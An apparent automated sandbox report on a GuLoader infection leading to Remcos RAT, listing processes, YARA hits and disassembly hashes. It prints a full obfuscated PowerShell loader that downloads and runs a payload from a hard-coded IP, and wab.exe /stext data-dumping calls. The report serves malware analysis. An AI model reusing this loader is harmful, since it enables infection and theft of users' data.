runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Snarlig ');Skildrerne (Gunflints 'Konkurr$ V.ndibgrigsvaalEfte slo VindicbPrierslaTeltn nlMandsdo:TresindCHippiati LillikrCen.rifcCarumseu AntiagmStolearsSidevejctransfor Gelosii Skarrib Nonp,riProclainR,ppledgUnga,va1Goldaks3Udkaare3Subtera=Keglesp$skyllesPGl,cocoaLftenebrHall,nboForandrlNordmane EksporeNonconssMaskins.ConfratsKunstvapDistriblKalvelbi Un erdtImmatri(Simplic$ColubriFStenf suStnkeprrStandsfiBoghandbKapitaluRub.ikkn.ejlensdDomicil) Ty gde ');Skildrerne (Gunflints 'Ndu gan[J.urnalN HjhuseeO,eosactBic,lor. ,okhavSCoprop,eAlkoholrBrightsvNecrotyiRidsefjc lejereeInterlaPS,inetsoDipl.piisquawfinOstepintA.acathMInd.rdeaHamartonkortfriaPaasta.gPlanlgneStivnenrDegforh]Kom,ker:Foundfl: Hel,deSJordskreTransvecAg,ntdiu aderskrcoapti iLemlstetUncivilyPolemikPSubs,itr BlisteoCo.ntertBro.kaloP.everic CulturoSk,vbunlBuffsbe Fol,tb= nbigge Later.l[RkvrkerNArckinge VldesftProcent.de.mareSAntisepeReflekscBjergaruConniverKaynetfiEskamottDrypsseyNeiatidP P rrelrResinizo anzonet HypertoFonematcFarmlano Rneb,ilplastsfTdiningmy ImperspSterlaneUndervu]Svagt.e: Incine:RegildfTC.evisvlthermicsChi ois1 Satin.2Buffoon ');$Parolees=$Circumscribing133[0];$Tubae= (Gunflints 'Surclif$takeup.gmedaljelrelstatoB.rgmesbE ilemmaDribledl Stepch: up,rtiA PrograkRepavestAmaze saKdehusfnGeograft,eflatim under o Ce,sordoricycleV,stenfledvinscsCons.bs=KommandNIndefrye DurianwMammoni-,eprievO.accinibStrafpojBesvarbeTvety,icDunnabstLamslaa .hokolaSwoadedey Pe,tapsAtingantcigare e Wronskm Gigado.Bem strNLithophe.ynipidtPostmes. Ge metWHighlane.ellbirbdecim lCOutswinlv,vacehikmpestoeBesyngenS ibestt');$Tubae+=$Kundetjenestens[1];Skildrerne ($Tubae);Skildrerne (Gunflints 'Adresse$ PengelAKabardck Coun,etUfrihedaAlenlannSkalotttAsse,temPromerco Ste.dddSodalite Ska arl.istandsUnderpi.Bl ckfeHKnkkreseK,nspeoaphotogrdPredamneBarytafrUdke nes Bejdse[omhandl$StandarsRumsterpS,krestlF ltrediSynkopefUnpsychfSlalomk]fejltry=Scriptu$FourageCSulphopr B omsty MelicrpBiograftHurdlenoSmdexclgHelfredlLytter a Rebuttu N,ncomx Campe, ');$Lbetidens=Gunflints ' r maun$PardeddAFrilandkDimmestt Nu,bedaAngakoknReauthotUnpeggemE.tersloImpeevid nticomeIchthyil O.ticisHavar r. A.trinD GribanoFleshl wC,ristenG.ossopl Tris.eoAnimi ma Jagg.ed I,dekoFAce.ylsiOnsswiml Gearale Calibe(tryksva$PreschoPParitetaeffoliarStrawbro UnvitilKaffekoeO.ooutpe Libid.sCurariz, Hypopo$tndehvlAMixbloorPrimovinTbruddeoHomoeoglBrandbyd StandasMatchet)Pik nte ';$Arnolds=$Kundetjenestens[0];Skildrerne (Gunflints 'M.rkeds$UnpropegLoquitulBlankebo,ristesbBrigadeaRullendlDi.turb:SensomoKGleanabfDisagretGreggrie Bumpi,r ,ortcusTr posp=Okkerfo(GlossopT Scan.ae injenusContractAethere-AfbrydePBenzinsaFokuse.t banalehPorop.y Minimum$.nfeminA lagg,rrGr ynesnvognfuloForge slPti,imndSjldenhs Re.nbu)Snorker ');while (!$Kfters) {Skildrerne (Gunflints 'Acetoni$ Spa drgPtyali.lPrdikatoBor.glybSprogfoaLucarnelStylish:Altern,FUndvreraraxingpaNaalenedSomatoce,usiodi=Nedslag$FunctiotUdbytter PhobicuLuftvaae Recipr ') ;Skildrerne $Lbetidens;Skildrerne (Gunflints ' ForrenSMellemttTy letsa orgivrBrugel,tUpupakr-CirkulrSIfuga,ulEarflapeIndst,de BriarepSlisken Rudeskr4flashly ');Skildrerne (Gunflints 'F,rudbe$ Bentjegkvintetl TermomoSem.orgb epetrpa GotfrelUskadel:KransenK Rebaptf Udmrk.tGaylefreLeopardrmoralizs Infor =Fastkr ( onfesTTab osieUnfondns hangertstereos- DustouPbudgiesaSchistatPrinterh Improb Demogra$Urede,bA Kas kurTrommetnCari atoK ndinglKnalderdForud.esKarakte).ryllup ') ;Skildrerne (Gunflints 'acceler$CognacegMorfinil GennemoMangonibEfterfoaLipodyslteleuto:Pat ticSCente ec HjovneaSmaaovem DoctorpRonnif iRagtimeeP oalcosTonneau=Sphecin$Rambledg .arietlkons,ruoSanmar,bOktavera DagldelHobende:ReflowiCSystal ahydrocotPentagyhJatropha,dresserDeweddoimarchern Afvbni+Lsehast+Oriflam%Udspalt$ReflexoCKargoeriCentigrrPaa aefcDis avouSubtensmUnderspsT.oublecEcrus,arRligs eisaggonibKok,ttoiJohannenchylifig Reli,t1Tilbund3Ama,gam3 amvitt.GrassmecUpaaagtoSporinguStaktopnTjattentLantern ') ;$Parolees=$Circumscribing133[$Scampies];}$Bibliomanis=316121;$Rehumanized=28218;Skildrerne (Gunflints 'Zincode$Kjoveacgsnu fbolSe ibaroSpectrobMaalscoa Rubinsl Mononu: isidenao ducerlA.legatfK,ypteraSpekulabdaemonye PlanlgtSolvolyiProgramsRidglinePhage erBurresneZygosi,sTrangbi Inhabil=Quaff.z IncentrG SteevieAftr,nitTimelns- .ohansCAnth acoFirma anDuksedrtParasite Brogu,nPo,arfot Cellsm Byvaa e$TribadiAChicnesrR.uterenOlivasto Fors,dlA.ainqudtippiessMarty,i ');Skildrerne (Gunflints 'Hy roco$ ChordegUnwithhlReturvroMicrosebSessel.aWagoneelCiviliz:PaategnBLserindvArbejd e BumekslTalmudisRawlplueNinepegr Sk inen edinafeSuburbl Ophobn=Lini mn Unsunke[whosisoS Landssy ImbrexsFal kmntKon,esseTricho mbib iot.IndarbeCB,oknivo KuglelnrappendvAgrobioe Nonvinr U,hailtFrys.di]Un,erst:Narcot.:.estrucFMenagerrMaintenoProportmideyka.BRverkulaLoka plsfoun.fueMisrule6Gus,abl4Sulf,glSAntikomt De,outrMoskvafiAdve.binUnpossigLin.ers(Overpow$KlintekaManhat,lLyocratfOmk,slea easandb OptageeAfsvovltWic,iupiAlbatiosSund,yieKirurgerSy dacteDistriks Labora)Ridesko ');Skildrerne (Gunflints 'defocus$ LigningDanaidelFra.kekohedon,sbCharybdaFattierlBaromet: LinninS ,resteiBalustel aronicv piesineTrllearrFli tlasDroso hmdegradeiCutletftstilli,hNrvrforsNonshri Botswan=Str,nin Cascad[AfhaareSGyp.schy YardwasKom agntOmbudsme.dstyknmTemp.ri.GynaecoT WuffgoeSkuffe.x.ousehotM.croso.Forva.tETre,ketnTorpe.oc Sulp ioPrognosdKlubkamiSalonkonSkumplegKik.ter]Kopsk f:Ptosish:kriminaA CuriouS,ampradCSarpopoITotemisISig,els.Ph.lantGAfstumpeVati,antCrossgrSTern.tft .kulperVict.mii SchoolnIndeflug.kattef(Forespo$ BrokadBKlangenvt iperseAccruablRedundas FlogmaeCommorarKatalogn CatdomeAngloam)Tigh fi ');Skildrerne (Gunflints 'Topwor.$ Fil prgInfloodltrkpa ioBrnebidb ogmrkeaScutel,lSalvier:RuefulnRPrangereFriha nsScrophutRecag ksBetnknit KanskerAutostoaOfr.rwhf,yedropfUdmar seFustagenIngeni,eBlodtabs Afsnit=Brlesin$ KlientSsuspirei Occurel Smackev BarbareTriptllrKardanesAfsendemModellei UnmatutPol.gonhVi.dspesOvovivi.Omg,dedsElsdyrsuOculospbAcarinosDykk netOutlippr AllotriAlteratnRevidergStorcir(Extrabu$UdbredeBPaandteiTelefo.b LnudvilheteropiVulgarioUna.atimEmi sioa MofussnTanglesi Accidestrussen,mancipi$FourthlRKvadrateCtosli.hRvhulleu Solecim psigelaHexosepnLini.reiEpidermzGeison,eParatesd.verskr)Noncl n ');Skildrerne $Reststraffenes;"
                  Imagebase:0x7ff7699e0000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.2377560186.0000026CE6643000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:2
                  Start time:04:27:00
                  Start date:02/07/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7699e0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:3
                  Start time:04:27:02
                  Start date:02/07/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t"
                  Imagebase:0x7ff6f2f40000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:4
                  Start time:04:27:10
                  Start date:02/07/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Snarlig ');Skildrerne (Gunflints 'Konkurr$ V.ndibgrigsvaalEfte slo VindicbPrierslaTeltn nlMandsdo:TresindCHippiati LillikrCen.rifcCarumseu AntiagmStolearsSidevejctransfor Gelosii Skarrib Nonp,riProclainR,ppledgUnga,va1Goldaks3Udkaare3Subtera=Keglesp$skyllesPGl,cocoaLftenebrHall,nboForandrlNordmane EksporeNonconssMaskins.ConfratsKunstvapDistriblKalvelbi Un erdtImmatri(Simplic$ColubriFStenf suStnkeprrStandsfiBoghandbKapitaluRub.ikkn.ejlensdDomicil) Ty gde ');Skildrerne (Gunflints 'Ndu gan[J.urnalN HjhuseeO,eosactBic,lor. ,okhavSCoprop,eAlkoholrBrightsvNecrotyiRidsefjc lejereeInterlaPS,inetsoDipl.piisquawfinOstepintA.acathMInd.rdeaHamartonkortfriaPaasta.gPlanlgneStivnenrDegforh]Kom,ker:Foundfl: Hel,deSJordskreTransvecAg,ntdiu aderskrcoapti iLemlstetUncivilyPolemikPSubs,itr BlisteoCo.ntertBro.kaloP.everic CulturoSk,vbunlBuffsbe Fol,tb= nbigge Later.l[RkvrkerNArckinge VldesftProcent.de.mareSAntisepeReflekscBjergaruConniverKaynetfiEskamottDrypsseyNeiatidP P rrelrResinizo anzonet HypertoFonematcFarmlano Rneb,ilplastsfTdiningmy ImperspSterlaneUndervu]Svagt.e: Incine:RegildfTC.evisvlthermicsChi ois1 Satin.2Buffoon ');$Parolees=$Circumscribing133[0];$Tubae= (Gunflints 'Surclif$takeup.gmedaljelrelstatoB.rgmesbE ilemmaDribledl Stepch: up,rtiA PrograkRepavestAmaze saKdehusfnGeograft,eflatim under o Ce,sordoricycleV,stenfledvinscsCons.bs=KommandNIndefrye DurianwMammoni-,eprievO.accinibStrafpojBesvarbeTvety,icDunnabstLamslaa .hokolaSwoadedey Pe,tapsAtingantcigare e Wronskm Gigado.Bem strNLithophe.ynipidtPostmes. Ge metWHighlane.ellbirbdecim lCOutswinlv,vacehikmpestoeBesyngenS ibestt');$Tubae+=$Kundetjenestens[1];Skildrerne ($Tubae);Skildrerne (Gunflints 'Adresse$ PengelAKabardck Coun,etUfrihedaAlenlannSkalotttAsse,temPromerco Ste.dddSodalite Ska arl.istandsUnderpi.Bl ckfeHKnkkreseK,nspeoaphotogrdPredamneBarytafrUdke nes Bejdse[omhandl$StandarsRumsterpS,krestlF ltrediSynkopefUnpsychfSlalomk]fejltry=Scriptu$FourageCSulphopr B omsty MelicrpBiograftHurdlenoSmdexclgHelfredlLytter a Rebuttu N,ncomx Campe, ');$Lbetidens=Gunflints ' r maun$PardeddAFrilandkDimmestt Nu,bedaAngakoknReauthotUnpeggemE.tersloImpeevid nticomeIchthyil O.ticisHavar r. A.trinD GribanoFleshl wC,ristenG.ossopl Tris.eoAnimi ma Jagg.ed I,dekoFAce.ylsiOnsswiml Gearale Calibe(tryksva$PreschoPParitetaeffoliarStrawbro UnvitilKaffekoeO.ooutpe Libid.sCurariz, Hypopo$tndehvlAMixbloorPrimovinTbruddeoHomoeoglBrandbyd StandasMatchet)Pik nte ';$Arnolds=$Kundetjenestens[0];Skildrerne (Gunflints 'M.rkeds$UnpropegLoquitulBlankebo,ristesbBrigadeaRullendlDi.turb:SensomoKGleanabfDisagretGreggrie Bumpi,r ,ortcusTr posp=Okkerfo(GlossopT Scan.ae injenusContractAethere-AfbrydePBenzinsaFokuse.t banalehPorop.y Minimum$.nfeminA lagg,rrGr ynesnvognfuloForge slPti,imndSjldenhs Re.nbu)Snorker ');while (!$Kfters) {Skildrerne (Gunflints 'Acetoni$ Spa drgPtyali.lPrdikatoBor.glybSprogfoaLucarnelStylish:Altern,FUndvreraraxingpaNaalenedSomatoce,usiodi=Nedslag$FunctiotUdbytter PhobicuLuftvaae Recipr ') ;Skildrerne $Lbetidens;Skildrerne (Gunflints ' ForrenSMellemttTy letsa orgivrBrugel,tUpupakr-CirkulrSIfuga,ulEarflapeIndst,de BriarepSlisken Rudeskr4flashly ');Skildrerne (Gunflints 'F,rudbe$ Bentjegkvintetl TermomoSem.orgb epetrpa GotfrelUskadel:KransenK Rebaptf Udmrk.tGaylefreLeopardrmoralizs Infor =Fastkr ( onfesTTab osieUnfondns hangertstereos- DustouPbudgiesaSchistatPrinterh Improb Demogra$Urede,bA Kas kurTrommetnCari atoK ndinglKnalderdForud.esKarakte).ryllup ') ;Skildrerne (Gunflints 'acceler$CognacegMorfinil GennemoMangonibEfterfoaLipodyslteleuto:Pat ticSCente ec HjovneaSmaaovem DoctorpRonnif iRagtimeeP oalcosTonneau=Sphecin$Rambledg .arietlkons,ruoSanmar,bOktavera DagldelHobende:ReflowiCSystal ahydrocotPentagyhJatropha,dresserDeweddoimarchern Afvbni+Lsehast+Oriflam%Udspalt$ReflexoCKargoeriCentigrrPaa aefcDis avouSubtensmUnderspsT.oublecEcrus,arRligs eisaggonibKok,ttoiJohannenchylifig Reli,t1Tilbund3Ama,gam3 amvitt.GrassmecUpaaagtoSporinguStaktopnTjattentLantern ') ;$Parolees=$Circumscribing133[$Scampies];}$Bibliomanis=316121;$Rehumanized=28218;Skildrerne (Gunflints 'Zincode$Kjoveacgsnu fbolSe ibaroSpectrobMaalscoa Rubinsl Mononu: isidenao ducerlA.legatfK,ypteraSpekulabdaemonye PlanlgtSolvolyiProgramsRidglinePhage erBurresneZygosi,sTrangbi Inhabil=Quaff.z IncentrG SteevieAftr,nitTimelns- .ohansCAnth acoFirma anDuksedrtParasite Brogu,nPo,arfot Cellsm Byvaa e$TribadiAChicnesrR.uterenOlivasto Fors,dlA.ainqudtippiessMarty,i ');Skildrerne (Gunflints 'Hy roco$ ChordegUnwithhlReturvroMicrosebSessel.aWagoneelCiviliz:PaategnBLserindvArbejd e BumekslTalmudisRawlplueNinepegr Sk inen edinafeSuburbl Ophobn=Lini mn Unsunke[whosisoS Landssy ImbrexsFal kmntKon,esseTricho mbib iot.IndarbeCB,oknivo KuglelnrappendvAgrobioe Nonvinr U,hailtFrys.di]Un,erst:Narcot.:.estrucFMenagerrMaintenoProportmideyka.BRverkulaLoka plsfoun.fueMisrule6Gus,abl4Sulf,glSAntikomt De,outrMoskvafiAdve.binUnpossigLin.ers(Overpow$KlintekaManhat,lLyocratfOmk,slea easandb OptageeAfsvovltWic,iupiAlbatiosSund,yieKirurgerSy dacteDistriks Labora)Ridesko ');Skildrerne (Gunflints 'defocus$ LigningDanaidelFra.kekohedon,sbCharybdaFattierlBaromet: LinninS ,resteiBalustel aronicv piesineTrllearrFli tlasDroso hmdegradeiCutletftstilli,hNrvrforsNonshri Botswan=Str,nin Cascad[AfhaareSGyp.schy YardwasKom agntOmbudsme.dstyknmTemp.ri.GynaecoT WuffgoeSkuffe.x.ousehotM.croso.Forva.tETre,ketnTorpe.oc Sulp ioPrognosdKlubkamiSalonkonSkumplegKik.ter]Kopsk f:Ptosish:kriminaA CuriouS,ampradCSarpopoITotemisISig,els.Ph.lantGAfstumpeVati,antCrossgrSTern.tft .kulperVict.mii SchoolnIndeflug.kattef(Forespo$ BrokadBKlangenvt iperseAccruablRedundas FlogmaeCommorarKatalogn CatdomeAngloam)Tigh fi ');Skildrerne (Gunflints 'Topwor.$ Fil prgInfloodltrkpa ioBrnebidb ogmrkeaScutel,lSalvier:RuefulnRPrangereFriha nsScrophutRecag ksBetnknit KanskerAutostoaOfr.rwhf,yedropfUdmar seFustagenIngeni,eBlodtabs Afsnit=Brlesin$ KlientSsuspirei Occurel Smackev BarbareTriptllrKardanesAfsendemModellei UnmatutPol.gonhVi.dspesOvovivi.Omg,dedsElsdyrsuOculospbAcarinosDykk netOutlippr AllotriAlteratnRevidergStorcir(Extrabu$UdbredeBPaandteiTelefo.b LnudvilheteropiVulgarioUna.atimEmi sioa MofussnTanglesi Accidestrussen,mancipi$FourthlRKvadrateCtosli.hRvhulleu Solecim psigelaHexosepnLini.reiEpidermzGeison,eParatesd.verskr)Noncl n ');Skildrerne $Reststraffenes;"
                  Imagebase:0x4d0000
                  File size:433'152 bytes
                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2236325736.0000000008060000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2236560886.0000000009F6C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2230426508.0000000005418000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:5
                  Start time:04:27:11
                  Start date:02/07/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t"
                  Imagebase:0x240000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:9
                  Start time:04:27:34
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                  Imagebase:0xc80000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2991104356.0000000002F0F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:10
                  Start time:04:27:58
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcunaectpsfuvitxczvfdsahw"
                  Imagebase:0xc80000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:11
                  Start time:04:27:58
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rezgswvvdaxhfwhbljiggfuyfzlyb"
                  Imagebase:0xc80000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:12
                  Start time:04:27:58
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\byfqtofpripmidvfcuvirkhhgovgcyok"
                  Imagebase:0xc80000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:13
                  Start time:04:28:04
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yhgaygccbnmkekwxnjvujyny"
                  Imagebase:0xc80000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:14
                  Start time:04:28:04
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima"
                  Imagebase:0xc80000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:15
                  Start time:04:28:04
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima"
                  Imagebase:0xc80000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:16
                  Start time:04:28:04
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tdzlsryxddwcregfnedpxpcyjtslpk"
                  Imagebase:0xc80000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Disassembly

                  Reset < >

                    Executed Functions

                    Function 00007FFD9B88B0F6 Relevance: .5, Instructions: 472COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.2397540799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 799f1fff4f06e2c7c24f391b632399a13d5561193c298f3657c69b67b0cf1c9d
                    • Instruction ID: baed93ac8f11ff7ed9347022082065e84d7f11fa6dc43e6eb640c97b533e51f4
                    • Opcode Fuzzy Hash: 799f1fff4f06e2c7c24f391b632399a13d5561193c298f3657c69b67b0cf1c9d
                    • Instruction Fuzzy Hash: B0F1C830A09E4E8FEBA8DF28C8557E937D1FF58310F04426EE85DC7695DB35A9418B82
                    Function 00007FFD9B88BEA2 Relevance: .5, Instructions: 457COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.2397540799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 33f91700ef43494c9860c158d67ffcb9cba50a951afe3f42ff1f3c5f92e16d54
                    • Instruction ID: 5a432be99233754084bd1d0577a26d27f5f7e3591ce1fef6e010fa6dbb21acce
                    • Opcode Fuzzy Hash: 33f91700ef43494c9860c158d67ffcb9cba50a951afe3f42ff1f3c5f92e16d54
                    • Instruction Fuzzy Hash: E9E1C330A09A4E8FEBA8DF28C8557E977D1FF58310F14426EE85DC7295DF38A9418B81
                    Function 00007FFD9B956609 Relevance: .5, Instructions: 481COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.2398260931.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
